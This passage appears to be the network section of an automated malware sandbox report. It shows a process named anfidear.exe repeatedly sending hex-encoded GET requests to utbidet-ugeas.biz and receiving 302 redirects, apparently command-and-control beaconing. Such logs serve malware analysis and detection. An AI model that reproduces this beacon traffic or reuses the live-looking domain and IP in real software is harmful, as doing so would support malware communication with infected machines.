                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02386E18EE386E18EE0A6E34EE386E3AB22C8AD27C386E2EC00A4021DC085E36EE
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    54192.168.2.1249829172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:11.342515945 CEST161OUTGET /d/N?0240CC510940CC510972CC7D0940CC735554289B9B40CC672772E2683B70FC7F09 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:11.861417055 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:11 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0240CC510940CC510972CC7D0940CC735554289B9B40CC672772E2683B70FC7F09
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    55192.168.2.1249831172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:14.368383884 CEST161OUTGET /d/N?02228A7717228A7717108A5B17228A554B366EBD85228A413910A44E2512BA5917 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:14.847193003 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:14 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02228A7717228A7717108A5B17228A554B366EBD85228A413910A44E2512BA5917
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    56192.168.2.1249833172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:15.540424109 CEST161OUTGET /d/N?02ECA9A87AECA9A87ADEA9847AECA98A26F84D62E8ECA99E54DE879148DC99867A HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:16.034637928 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:15 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02ECA9A87AECA9A87ADEA9847AECA98A26F84D62E8ECA99E54DE879148DC99867A
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    57192.168.2.1249835172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:17.837033033 CEST161OUTGET /d/N?0290F8259690F82596A2F8099690F807CA841CEF0490F813B8A2D61CA4A0C80B96 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:18.390099049 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:18 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0290F8259690F82596A2F8099690F807CA841CEF0490F813B8A2D61CA4A0C80B96
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    58192.168.2.1249837172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:19.120829105 CEST161OUTGET /d/N?02B2A29EC9B2A29EC980A2B2C9B2A2BC95A646545BB2A2A8E7808CA7FB8292B0C9 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:19.611469984 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:19 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02B2A29EC9B2A29EC980A2B2C9B2A2BC95A646545BB2A2A8E7808CA7FB8292B0C9
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    59192.168.2.1249839172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:19.743432999 CEST161OUTGET /d/N?028EB38B628EB38B62BCB3A7628EB3A93E9A5741F08EB3BD4CBC9DB250BE83A562 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:20.219438076 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:20 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?028EB38B628EB38B62BCB3A7628EB3A93E9A5741F08EB3BD4CBC9DB250BE83A562
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    60192.168.2.1249841172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:24.290174007 CEST161OUTGET /d/N?025C30053D5C30053D6E30293D5C30276148D4CFAF5C3033136E1E3C0F6C002B3D HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:24.795100927 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:24 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?025C30053D5C30053D6E30293D5C30276148D4CFAF5C3033136E1E3C0F6C002B3D
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    61192.168.2.1249843172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:26.977761984 CEST161OUTGET /d/N?0228C39BB528C39BB51AC3B7B528C3B9E93C27512728C3AD9B1AEDA28718F3B5B5 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:27.458455086 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:27 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0228C39BB528C39BB51AC3B7B528C3B9E93C27512728C3AD9B1AEDA28718F3B5B5
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    62192.168.2.1249845172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:28.308625937 CEST161OUTGET /d/N?02B20D2E56B20D2E56800D0256B20D0C0AA6E9E4C4B20D187880231764823D0056 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:28.792714119 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:28 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02B20D2E56B20D2E56800D0256B20D0C0AA6E9E4C4B20D187880231764823D0056
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    63192.168.2.1249847172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:29.493495941 CEST161OUTGET /d/N?02B2922A64B2922A6480920664B2920838A676E0F6B2921C4A80BC135682A20464 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:29.994913101 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:29 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02B2922A64B2922A6480920664B2920838A676E0F6B2921C4A80BC135682A20464
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    64192.168.2.1249849172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:30.524547100 CEST161OUTGET /d/N?020F3666CC0F3666CC3D364ACC0F3644901BD2AC5E0F3650E23D185FFE3F0648CC HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:31.070664883 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:30 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?020F3666CC0F3666CC3D364ACC0F3644901BD2AC5E0F3650E23D185FFE3F0648CC
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    65192.168.2.1249851172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:31.218151093 CEST161OUTGET /d/N?0266765C2166765C215476702166767E7D729296B366766A0F5458651356467221 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:31.879606962 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:31 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0266765C2166765C215476702166767E7D729296B366766A0F5458651356467221
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    66192.168.2.1249853172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:33.328048944 CEST161OUTGET /d/N?022EFA15E32EFA15E31CFA39E32EFA37BF3A1EDF712EFA23CD1CD42CD11ECA3BE3 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:33.819684982 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:33 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?022EFA15E32EFA15E31CFA39E32EFA37BF3A1EDF712EFA23CD1CD42CD11ECA3BE3
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    67192.168.2.1249855172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:35.173039913 CEST161OUTGET /d/N?02CCF84FD9CCF84FD9FEF863D9CCF86D85D81C854BCCF879F7FED676EBFCC861D9 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:35.657118082 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
